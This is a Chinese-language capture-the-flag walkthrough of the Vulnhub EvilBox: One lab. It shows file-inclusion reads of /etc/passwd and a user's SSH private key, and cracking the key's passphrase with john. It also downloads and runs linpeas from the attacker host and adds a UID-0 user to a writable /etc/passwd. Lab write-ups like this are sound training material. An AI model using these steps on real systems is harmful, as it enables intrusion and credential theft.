Vulnhub之EvilBox 1超级详细测试过程
EvilBox
作者:jason_huawen
靶机信息
名称:EvilBox: One
地址:
https://www.vulnhub.com/entry/evilbox-one,736/
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:c7:64:09 1 60 PCS Systemtechnik GmbH
192.168.56.166 08:00:27:a0:af:37 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址192.168.56.166
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.166 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-11 02:35 EST
Nmap scan report for bogon (192.168.56.166)
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A0:AF:37 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.09 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ curl http://192.168.56.166/robots.txt
Hello H4x0r
H4x0r,作者这是给出什么提示,难道是异或运算?跟什么进行异或?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ nikto -h http://192.168.56.166
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.166
+ Target Hostname: 192.168.56.166
+ Target Port: 80
+ Start Time: 2023-01-11 02:37:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c9a9bb4d712e, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-01-11 02:38:37 (GMT-5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ curl http://192.168.56.166/secret/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.166
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/11 02:39:22 Starting gobuster in directory enumeration mode
===============================================================
/secret (Status: 301) [Size: 317] [--> http://192.168.56.166/secret/]
/server-status (Status: 403) [Size: 279]
Progress: 220344 / 220561 (99.90%)
===============================================================
2023/01/11 02:40:07 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.166
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: js,txt,php,html,sh
[+] Timeout: 10s
===============================================================
2023/01/11 02:40:17 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/robots.txt (Status: 200) [Size: 12]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.166/secret/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1322160 / 1323366 (99.91%)
===============================================================
2023/01/11 02:45:02 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.sh,.js,.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.166
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2023/01/11 02:45:28 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.166/secret/]
/robots.txt (Status: 200) [Size: 12]
/server-status (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 133379 / 373710 (35.69%)[ERROR] 2023/01/11 02:45:56 [!] parse "http://192.168.56.166/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:56 [!] parse "http://192.168.56.166/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:56 [!] parse "http://192.168.56.166/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:56 [!] parse "http://192.168.56.166/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:56 [!] parse "http://192.168.56.166/besalu\t.txt": net/url: invalid control character in URL
Progress: 142044 / 373710 (38.01%)[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/01/11 02:45:58 [!] parse "http://192.168.56.166/error\x1f_log.php": net/url: invalid control character in URL
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 372844 / 373710 (99.77%)
===============================================================
2023/01/11 02:46:51 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.166
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: sh,js,txt,php,html
[+] Timeout: 10s
===============================================================
2023/01/11 02:47:08 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.sh (Status: 403) [Size: 279]
/.htaccess.js (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.js (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.sh (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/robots.txt (Status: 200) [Size: 12]
/robots.txt (Status: 200) [Size: 12]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.166/secret/]
/server-status (Status: 403) [Size: 279]
Progress: 121831 / 122862 (99.16%)
===============================================================
2023/01/11 02:47:31 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/seclists/Discovery/Web-Content/common -x .php,.html,.sh,.js,.txt
Error: error on parsing arguments: wordlist file "/usr/share/seclists/Discovery/Web-Content/common" does not exist: stat /usr/share/seclists/Discovery/Web-Content/common: no such file or directory
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ gobuster dir -u http://192.168.56.166 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.166
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2023/01/11 02:47:49 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.hta.html (Status: 403) [Size: 279]
/.hta.sh (Status: 403) [Size: 279]
/.hta.js (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htaccess.sh (Status: 403) [Size: 279]
/.htaccess.js (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.sh (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.js (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/index.html (Status: 200) [Size: 10701]
/robots.txt (Status: 200) [Size: 12]
/robots.txt (Status: 200) [Size: 12]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.166/secret/]
/server-status (Status: 403) [Size: 279]
Progress: 27774 / 28284 (98.20%)
===============================================================
2023/01/11 02:47:54 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ dirb http://192.168.56.166
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 11 02:48:57 2023
URL_BASE: http://192.168.56.166/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.166/ ----
+ http://192.168.56.166/index.html (CODE:200|SIZE:10701)
+ http://192.168.56.166/robots.txt (CODE:200|SIZE:12)
==> DIRECTORY: http://192.168.56.166/secret/
+ http://192.168.56.166/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.166/secret/ ----
+ http://192.168.56.166/secret/index.html (CODE:200|SIZE:4)
-----------------
END_TIME: Wed Jan 11 02:49:01 2023
DOWNLOADED: 9224 - FOUND: 4
在用了gobuster, dirb以及各个主要的字典对目标进行目录文件扫描,一无所获。太奇怪了,靶机的难度级别是easy?哈哈,再用dirbuster尝试一下:
竟然发现了在/secret目录下有evil.php文件,其实前面gobuster在扫描出/secret目录后,应该继续扫描一下该目录下有无子目录或者文件!
访问evil.php文件
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ curl http://192.168.56.166/secret/evil.php
没有任何返回,可能需要提供参数。
──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ wfuzz -c -u http://192.168.56.166/secret/evil.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.166/secret/evil.php?FUZZ=id
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 280.3646
Processed Requests: 220560
Filtered Requests: 220560
Requests/sec.: 786.6896
没有FUZZ出参数,修改一下Payload,继续FUZZ
──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ wfuzz -c -u http://192.168.56.166/secret/evil.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.166/secret/evil.php?FUZZ=../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000013351: 200 26 L 38 W 1398 Ch "command"
至此已经FUZZ出参数名称为command
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ curl http://192.168.56.166/secret/evil.php?command=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
已经得到了用户名mowree,自然地接下来要看下有无其ssh私钥文件
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ curl http://192.168.56.166/secret/evil.php?command=/home/mowree/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
哈哈,惊喜!继续
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ vim id_rsa
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ ssh -i id_rsa mowree@192.168.56.166
Enter passphrase for key 'id_rsa':
看来私钥文件有口令保护。
──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ ssh2john id_rsa >hashes
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)
1g 0:00:00:00 DONE (2023-01-11 03:09) 4.761g/s 5942p/s 5942c/s 5942C/s pedro..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ ssh -i id_rsa mowree@192.168.56.166
Enter passphrase for key 'id_rsa':
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
mowree@EvilBoxOne:~$
至此得到了User Flag
提权
将linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,并执行该脚本:
mowree@EvilBoxOne:/tmp$ wget http://192.168.56.146:8000/linpeas.sh
--2023-01-11 09:13:20-- http://192.168.56.146:8000/linpeas.sh
Conectando con 192.168.56.146:8000... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 765823 (748K) [text/x-sh]
Grabando a: “linpeas.sh”
linpeas.sh 100%[=====================================================>] 747,87K --.-KB/s en 0,005s
2023-01-11 09:13:20 (159 MB/s) - “linpeas.sh” guardado [765823/765823]
mowree@EvilBoxOne:/tmp$ chmod +x linpeas.sh
mowree@EvilBoxOne:/tmp$ ./linpeas.sh
linpeas.sh执行结果中:
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
可以对/etc/passwd文件进行读写操作
在Kali Linux本地创建密码:(其中jason是salt值,随便写的)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Evilbox]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41
将用户名jason以及为其创建的密码追加到/etc/passwd文件中去:
mowree@EvilBoxOne:/tmp$ nano /etc/passwd
mowree@EvilBoxOne:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash
然后切换到jason用户,该用户由于UID为0,因此有root权限:
mowree@EvilBoxOne:/tmp$ su jason
Contraseña:
root@EvilBoxOne:/tmp# cd /root
root@EvilBoxOne:~# ls -alh
total 24K
drwx------ 3 root root 4,0K ago 16 2021 .
drwxr-xr-x 18 root root 4,0K ago 16 2021 ..
lrwxrwxrwx 1 root root 9 ago 16 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3,5K ago 16 2021 .bashrc
